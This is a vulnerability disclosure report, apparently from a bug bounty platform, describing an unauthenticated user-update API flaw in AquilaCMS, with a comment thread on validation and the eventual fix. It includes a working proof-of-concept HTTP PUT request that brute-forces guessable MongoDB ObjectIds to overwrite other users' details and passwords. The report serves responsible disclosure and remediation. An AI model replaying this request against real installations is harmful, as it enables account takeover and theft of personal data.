Incorrect Use of Privileged APIs in aquilacms/aquilacms

Valid

Reported on

Aug 1st 2021


✍️ Description

Unauthenticated API function allows any user to change OR view another user first name, last name, password, and address information. As well, leaked activateAccountToken and resetPassToken can be viewed.

🕵️‍♂️ Proof of Concept

The attacker can guess the correct MongoDB_object ID and it is not secured and leaked during registration. The attacker once obtains one valid Object_id can use the linked GitHub repo to generate other users' object_id. Using the following API call, the attacker does not need to be logged in and would brute force the _id parameter;

Variables: { IP }, { ID_TO_GUESS }

PUT /api/v2/user HTTP/1.1
Host: { IP }:3010
Content-Length: 245
Accept: application/json, text/plain, */*
lang: en
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/91.0.4472.114 Safari/537.36
Content-Type: application/json;charset=UTF-8
Origin: http://{IP}:3010
Referer: http://{IP}:3010/account
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Connection: close

{"delivery_address":1,"billing_address":0,"isActiveAccount":false,"_id":" { ID_TO_GUESS }","civility":1,"lastname":"whatever20","firstname":"whatever","email":"admin2@admin2.aaa","preferredLanguage":"en","fullname":"whatever whatever10"}

Response:

HTTP/1.1 200 OK
X-Powered-By: Express
Access-Control-Allow-Origin: *
Set-Cookie: cookie_notice=false; Path=/; Expires=Mon, 01 Nov 2021 22:16:10 GMT
Content-Type: application/json; charset=utf-8
Content-Length: 1037
ETag: W/"40d-F8j15BnKHmYafwqqrsJh8golXDg"
Date: Sun, 01 Aug 2021 22:16:11 GMT
Connection: close


{"code":"USER_UPDATE_SUCCESS",
...
....

💥 Impact

An attacker can gain all information about any user, leaking addresses, addresses, and tokens. As well, can overwrite this information, and change another user's password. Total Account compromise is possible through this one API call.

🩹 Remediation

Do not use MongoDB object ID as the ID for user accounts, instead of a randomized, 32-byte string, or specially uuid's. Ensure that users using the API are authenticated!

📍 Location

users.js#L86

📝 References https://github.com/andresriancho/mongo-objectid-predict 📍 Location users.js#L86 📝 References https://github.com/andresriancho/mongo-objectid-predict

SmashSnacks modified the report
10 months ago
SmashSnacks
10 months ago

Researcher


@admin, how long do we wait?

Jamie Slome
10 months ago

Admin


Great job on your disclosure!

As you can see, we have made contact with the maintainer via a GitHub Issue and are waiting to hear back from them (i.e. to create a SECURITY.md) so that we can share a magic link with them where they can validate or invalidate this disclosure.

We have contacted a member of the aquilacms team and are waiting to hear back 10 months ago
Z-Old
10 months ago

Admin


Hey SmashSnacks, the maintainers got back to us by email, asking us to fill out a form. I've gone and done that for you, so we're just waiting for their response now. Good job!

SmashSnacks modified the report
10 months ago
SmashSnacks modified the report
10 months ago
aquilacms/aquilacms maintainer validated this vulnerability 9 months ago
SmashSnacks has been awarded the disclosure bounty
The fix bounty is now up for grabs
SmashSnacks
9 months ago

Researcher


@admin, now that this is validated, is it possible to submit for CVE?

aquilacms/aquilacms maintainer
9 months ago

Thanks for this "disclosure bounty". We'll fix this in the next days

Jamie Slome
9 months ago

Admin


@SmashSnacks - we are currently building out our automated CVE system. Once this is live, it will back assign for all applicable vulnerabilities.

SmashSnacks
7 months ago

Researcher


has this been patched?

aquilacms/aquilacms maintainer
18 days ago

Yes ! https://github.com/AquilaCMS/AquilaCMS/pull/164

aquilacms/aquilacms maintainer
18 days ago

But I cannot mark as fixed (huntr bug)

Jamie Slome
18 days ago

Admin


@maintainer - could you please resolve the report by marking the report as fixed?

You can do this by clicking Resolve below 👍

Jamie Slome
18 days ago

Admin


What is the issue you are seeing when trying to mark it as fixed?

Jamie Slome
18 days ago

Admin


Can you confirm which version has the patch been applied to? I can then help you mark the report as fixed 👍

Jamie Slome confirmed that a fix has been merged on 78ae4f 18 days ago
The fix bounty has been dropped
aquilacms/aquilacms maintainer gave praise 17 days ago
Hashes : 78ae4fec858b07540cb0f8bfb1e3169af38168ad b048f06cc57c633f69bc74fbdecb9a6ecaf71037 v 1.205.04
The researcher's credibility has slightly increased as a result of the maintainer's thanks: +1
to join this conversation